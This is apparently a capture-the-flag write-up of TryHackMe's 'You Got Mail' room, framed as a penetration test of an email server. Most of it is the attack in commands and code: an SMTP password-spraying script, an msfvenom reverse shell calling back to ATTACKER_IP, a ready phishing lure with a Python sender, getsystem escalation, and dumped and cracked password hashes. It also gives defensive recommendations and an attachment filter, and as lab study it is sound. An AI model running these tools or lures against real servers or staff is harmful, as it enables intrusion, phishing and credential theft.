You Got Mail
A detailed case study of exploiting an email server to gain unauthorized access — from reconnaissance to privilege escalation.
This case study documents a penetration test conducted against a company called Brik (brownbrick.co). The assessment included both passive reconnaissance of their web presence and active testing of their email infrastructure.
The scope included strictly passive reconnaissance on the domain brownbrick.co and active assessment on the target server. The goal was to identify vulnerabilities in their email system and demonstrate potential attack vectors.
1. Reconnaissance
Website Analysis
The company website brownbrick.co revealed several key pieces of information:
- Company name: Brik (established 1950)
- Website designed by HTML Codex
- Team member information including emails
- Email format: first initial followed by surname, all lowercase (e.g. oaurelius@brownbrick.co), so valid usernames are predictable from the staff names alone

Employee Information
The "Our Team" page revealed six employees with their email addresses:

Discovered Email Addresses:
- oaurelius@brownbrick.co - Omar Aurelius
- wrohit@brownbrick.co - Winifred Rohit
- lhedvig@brownbrick.co - Laird Hedvig
- tchikondi@brownbrick.co - Titus Chikondi
- pcathrine@brownbrick.co - Pontos Cathrine
- fstamatis@brownbrick.co - Filimena Stamatis
Port Scanning
An Nmap scan of the target server revealed several open ports and services:
Email Services
- 25/TCP SMTP (hMailServer)
- 110/TCP POP3 (hMailServer)
- 143/TCP IMAP (hMailServer)
- 587/TCP SMTP Submission
Windows Services
- 135/TCP Microsoft RPC
- 139/TCP NetBIOS
- 445/TCP SMB
- 3389/TCP RDP
System Information
- Hostname: BRICK-MAIL
- OS: Windows Server
- Mail Server: hMailServer
Nmap scan report for BRICK-MAIL (10.10.X.X)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: TOP UIDL USER
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
445/tcp open microsoft-ds?
587/tcp open smtp hMailServer smtpd
3389/tcp open ms-wbt-server Microsoft Terminal Services
2. Credential Discovery
Custom Wordlist Generation
Using the website content to generate a custom wordlist with cewl:
$ cewl --lowercase https://brownbrick.co > passwords.txt
Notable words extracted:
Credential Brute Forcing
Using Hydra to brute force SMTP logins with the discovered addresses as usernames (hMailServer authenticates with the full address, so the email list doubles as the user list) and the cewl wordlist:
$ hydra -L emails.txt -P passwords.txt smtp://10.10.X.X

Discovered Credentials:
lhedvig@brownbrick.co:bricks
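The address-format observation and the Hydra run above, as an added example rather than the page's own tooling: it derives the six target addresses from the team names, then drives the same AUTH LOGIN exchange that hMailServer advertised on port 25 (base64 prompts for "Username:" and "Password:", 235 on success, 535 on failure) against each user/password pair. Because there is no target to connect to offline, the block also includes a stand-in server that speaks just enough SMTP to answer the spray; the account it accepts (lhedvig@brownbrick.co:bricks) and the five-word wordlist are constructed to mirror the page's result, not captured from the real host.

```python
import base64
import socket
import threading

# Constructed inputs modelled on the page: the six names from the "Our Team"
# page and a few words of the kind cewl pulls from the public website.
TEAM = ["Omar Aurelius", "Winifred Rohit", "Laird Hedvig",
        "Titus Chikondi", "Pontos Cathrine", "Filimena Stamatis"]
WORDLIST = ["brik", "brick", "bricks", "quality", "construction"]

# Hypothetical account table for the stand-in server below; it is not the
# real target and only exists so the exchange can be run offline.
STUB_ACCOUNTS = {"lhedvig@brownbrick.co": "bricks"}


def make_targets(names, domain="brownbrick.co"):
    """Apply the address format seen on the site: first initial + surname."""
    return [(n.split()[0][0] + n.split()[-1]).lower() + "@" + domain for n in names]


def _reply_code(sock):
    """Read one SMTP reply, including multi-line '250-' replies; return the code."""
    buf = b""
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("server closed the connection")
        buf += chunk
        lines = buf.split(b"\r\n")
        # The reply is complete once a full line has a space after the code.
        if len(lines) >= 2 and len(lines[-2]) >= 4 and lines[-2][3:4] == b" ":
            return int(lines[-2][:3])


def try_auth_login(host, port, user, password, timeout=5.0):
    """One AUTH LOGIN attempt, the mechanism BRICK-MAIL advertised on port 25.
    Both prompts and both answers are merely base64, not encrypted."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        _reply_code(s)                                   # 220 banner
        s.sendall(b"EHLO attacker\r\n")
        _reply_code(s)                                   # 250-... AUTH LOGIN
        s.sendall(b"AUTH LOGIN\r\n")
        if _reply_code(s) != 334:                        # 334 VXNlcm5hbWU6
            return False
        s.sendall(base64.b64encode(user.encode()) + b"\r\n")
        if _reply_code(s) != 334:                        # 334 UGFzc3dvcmQ6
            return False
        s.sendall(base64.b64encode(password.encode()) + b"\r\n")
        code = _reply_code(s)                            # 235 ok / 535 fail
        s.sendall(b"QUIT\r\n")
        return code == 235


def spray(host, port, users, passwords):
    """The Hydra loop: every user against every password, hits collected."""
    return [(u, p) for u in users for p in passwords
            if try_auth_login(host, port, u, p)]


def _serve_one(conn):
    """Server side of the same dialogue, enough for the spray to run against."""
    rf = conn.makefile("rb")
    try:
        conn.sendall(b"220 BRICK-MAIL ESMTP\r\n")
        while True:
            cmd = rf.readline().strip().upper()
            if not cmd or cmd == b"QUIT":
                conn.sendall(b"221 Bye\r\n")
                break
            if cmd.startswith(b"EHLO"):
                conn.sendall(b"250-BRICK-MAIL\r\n250-SIZE 20480000\r\n"
                             b"250-AUTH LOGIN\r\n250 HELP\r\n")
            elif cmd == b"AUTH LOGIN":
                conn.sendall(b"334 " + base64.b64encode(b"Username:") + b"\r\n")
                user = base64.b64decode(rf.readline().strip()).decode()
                conn.sendall(b"334 " + base64.b64encode(b"Password:") + b"\r\n")
                pw = base64.b64decode(rf.readline().strip()).decode()
                ok = STUB_ACCOUNTS.get(user) == pw
                conn.sendall(b"235 Authentication succeeded\r\n" if ok
                             else b"535 Authentication failed\r\n")
            else:
                conn.sendall(b"500 Unrecognized command\r\n")
    except OSError:
        pass
    finally:
        conn.close()


def start_stub_server():
    """Start the stand-in on 127.0.0.1 and an ephemeral port; return (host, port)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def accept_loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=_serve_one, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()


if __name__ == "__main__":
    host, port = start_stub_server()
    print(spray(host, port, make_targets(TEAM), WORDLIST))
```

Run stand-alone it prints the single hit. Note what the exchange shows: with no STARTTLS in the EHLO reply on port 25, the credentials cross the wire base64-encoded only, so the spray is as visible to anyone on the path as it is to the server, and a server that throttled or locked out after a burst of 535 replies would have stopped it after a handful of attempts.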
3. Social Engineering Attack
Payload Creation
Creating a malicious payload disguised as an Office update using msfvenom:
$ msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=ATTACKER_IP LPORT=8888 \
-f exe -o OfficeUpdate.exe
Attack Strategy:
- Create a convincing malicious payload
- Craft a persuasive email that encourages recipients to run the attachment
- Use compromised email account to send the payload to other employees
- Set up a listener to catch incoming connections
Phishing Email
Using the compromised account to send a convincing phishing email to other employees:
Subject: Action Required: Office Update!
Hello,
I have recently been informed by IT that we need to immediately install the new Office update. For your convenience, I have attached the file below that will automatically update your machine. Please download and run the attached program.
Thanks,
Laird
Starting the handler before the mail goes out, so the first callback is not missed:
$ msfconsole -q -x "use multi/handler; \
set payload windows/x64/meterpreter/reverse_tcp; \
set lhost ATTACKER_IP; \
set lport 8888; \
exploit"
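Sending the lure from the compromised mailbox is the one step of the attack strategy above that the page shows no command for. The following is an added example (not the page's or the room's code) of how the message is assembled and submitted with Python's standard library, alongside the attachment check a mail gateway should have applied to it. The sender, recipients, subject and body are taken from the page; the payload bytes are a constructed stand-in (a bare "MZ" header), and the blocked-extension list is an assumed policy.

```python
import smtplib
from email.message import EmailMessage
from email.utils import formatdate, make_msgid

# Details from the page: the compromised sender, the other five addresses and
# the lure text. The payload bytes are a constructed stand-in, a DOS "MZ"
# header plus padding, not the msfvenom executable.
SENDER = "lhedvig@brownbrick.co"
RECIPIENTS = ["oaurelius@brownbrick.co", "wrohit@brownbrick.co",
              "tchikondi@brownbrick.co", "pcathrine@brownbrick.co",
              "fstamatis@brownbrick.co"]
SUBJECT = "Action Required: Office Update!"
BODY = ("Hello,\n\nI have recently been informed by IT that we need to immediately "
        "install the new Office update. For your convenience, I have attached the "
        "file below that will automatically update your machine. Please download "
        "and run the attached program.\n\nThanks,\nLaird\n")
FAKE_PAYLOAD = b"MZ" + b"\x00" * 62

# Extensions a mail gateway should refuse outright (assumed policy list).
BLOCKED_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js",
                      ".jse", ".vbs", ".ps1", ".hta", ".msi", ".dll"}


def build_phish(sender, recipients, subject, body, filename, payload):
    """Assemble the lure as multipart/mixed: text body plus a binary attachment."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = ", ".join(recipients)
    msg["Subject"] = subject
    msg["Date"] = formatdate(localtime=True)
    msg["Message-ID"] = make_msgid(domain=sender.split("@", 1)[1])
    msg.set_content(body)
    # Declared as generic binary; a gateway sees only the name and the bytes.
    msg.add_attachment(payload, maintype="application", subtype="octet-stream",
                       filename=filename)
    return msg


def send_via_submission(msg, host, user, password, port=587):
    """Send through the submission port that was open on BRICK-MAIL, logging in
    as the compromised user. smtplib negotiates STARTTLS when offered and picks
    AUTH LOGIN when that is the only mechanism advertised. Network call; not
    exercised in the stand-alone run."""
    with smtplib.SMTP(host, port, timeout=15) as smtp:
        smtp.ehlo()
        if smtp.has_extn("starttls"):
            smtp.starttls()
            smtp.ehlo()
        smtp.login(user, password)
        smtp.send_message(msg)


def flag_dangerous_attachments(msg):
    """The control the mail server lacked: name every attachment that is
    executable by extension or by content (PE files start with 'MZ')."""
    flagged = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        ext = ("." + name.rsplit(".", 1)[1]).lower() if "." in name else ""
        data = part.get_payload(decode=True) or b""
        if ext in BLOCKED_EXTENSIONS or data[:2] == b"MZ":
            flagged.append(name)
    return flagged


if __name__ == "__main__":
    lure = build_phish(SENDER, RECIPIENTS, SUBJECT, BODY, "OfficeUpdate.exe", FAKE_PAYLOAD)
    print(lure.as_string()[:400])
    print("gateway would flag:", flag_dangerous_attachments(lure))
    # send_via_submission(lure, "10.10.X.X", SENDER, "bricks")  # target only
```

The check flags by content as well as by name, so renaming OfficeUpdate.exe to OfficeUpdate.pdf does not get it through. send_via_submission() is the only part that touches the network and stays commented out in the stand-alone run.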
4. Initial Access & Privilege Escalation
Successful Compromise
The user wrohit (Winifred Rohit) opened the malicious attachment, and the reverse shell came back from BRICK-MAIL itself: the employee was logged on to the mail server, so the first foothold already sat on the most sensitive host in scope:

[+] Sending stage (200774 bytes) to 10.10.X.X
[+] Meterpreter session 1 opened (10.10.X.X:8888 → 10.10.X.X:49792)
meterpreter > getuid
Server username: BRICK-MAIL\wrohit
Privilege Escalation
Using Meterpreter's built-in privilege escalation techniques to gain SYSTEM access:
meterpreter > getsystem
... got system via technique 1 (Named Pipe Impersonation).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Privilege Escalation Vectors:
- Named Pipe Impersonation (successful)
- Token Duplication
- Secondary Logon Handle
getsystem's named pipe technique creates a service that connects to a pipe owned by the Meterpreter process and impersonates the connecting SYSTEM token; it only works when the session already runs with local administrator rights. Its immediate success therefore shows that wrohit's account is a local administrator on BRICK-MAIL and that the payload ran with those rights, not that a security patch is missing.
5. Credential Harvesting
Windows Account Hashes
Using the hashdump command to extract password hashes from the system:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2dfe3378335d43f9764e581b856a662a:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
fstamatis:1009:aad3b435b51404eeaad3b435b51404ee:034c830cc313485a82e57a0d9dfa14e4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
lhedvig:1010:aad3b435b51404eeaad3b435b51404ee:034c830cc313485a82e57a0d9dfa14e4:::
oaurelius:1011:aad3b435b51404eeaad3b435b51404ee:034c830cc313485a82e57a0d9dfa14e4:::
pcathrine:1012:aad3b435b51404eeaad3b435b51404ee:034c830cc313485a82e57a0d9dfa14e4:::
tchikondi:1013:aad3b435b51404eeaad3b435b51404ee:034c830cc313485a82e57a0d9dfa14e4:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
wrohit:1014:aad3b435b51404eeaad3b435b51404ee:8458995f1d0a4b0c107fb8e23362c814:::
Hash Cracking Results:
Using Hashcat to crack the extracted NT hashes (hashes.txt is the hashdump output unchanged; --username makes hashcat accept the user:RID:LM:NT::: layout and report the user with each crack):
$ hashcat -m 1000 --username hashes.txt /usr/share/wordlists/rockyou.txt
wrohit:superstar
Five employee accounts (fstamatis, lhedvig, oaurelius, pcathrine, tchikondi) share the NT hash 034c830cc313485a82e57a0d9dfa14e4. NT hashes are unsalted, so an identical hash means an identical password, and cracking it once opens all five accounts.
Mail Server Credentials
hMailServer keeps its administrator password in hMailServer.ini as an unsalted MD5 digest, so reading the file is enough to attack it offline:

meterpreter > cat "C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini"
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[Security]
AdministratorPassword=5f4dcc3b5aa765d61d8327deb882cf99
Hash Cracking Results:
Cracking the hMailServer administrator hash with hashcat's raw MD5 mode (-m 0):
$ hashcat -m 0 admin_hash.txt /usr/share/wordlists/rockyou.txt
Administrator:password
Key Findings & Recommendations
Critical Vulnerabilities
Weak Password Policies
Multiple accounts use simple dictionary passwords (bricks, superstar, password); five employee accounts share one NT hash, i.e. one local password; and the hMailServer administrator password is stored as an unsalted MD5 in hMailServer.ini, which rockyou cracks instantly.
Excessive Local Privileges
A standard employee account (wrohit) holds local administrator rights on the mail server, which is what allowed getsystem's named pipe impersonation to reach SYSTEM without any exploit.
Insufficient Email Security
Email server allows sending executable attachments without filtering.
Poor Security Awareness
Users susceptible to basic social engineering attacks.
Security Recommendations
Implement Strong Password Policy
Enforce a minimum length, screen new passwords against breached-password lists and company-specific words (a cewl run over the public website produced "bricks"), forbid one password across several accounts, reset any credential shown to be compromised, and require multi-factor authentication for mail and RDP.
Regular Security Patching
Establish a routine patching schedule for all systems and applications.
Email Security Controls
Block or quarantine executable attachments at the mail server (OfficeUpdate.exe passed through untouched), sandbox what remains, and throttle or alert on bursts of failed SMTP AUTH attempts such as the Hydra spray on port 25. SPF, DKIM and DMARC are still worth deploying against spoofed senders, but they would not have stopped this message, which was sent from a genuinely compromised internal account.
Security Awareness Training
Conduct regular phishing simulations and security awareness sessions.
Based on TryHackMe's "You Got Mail" room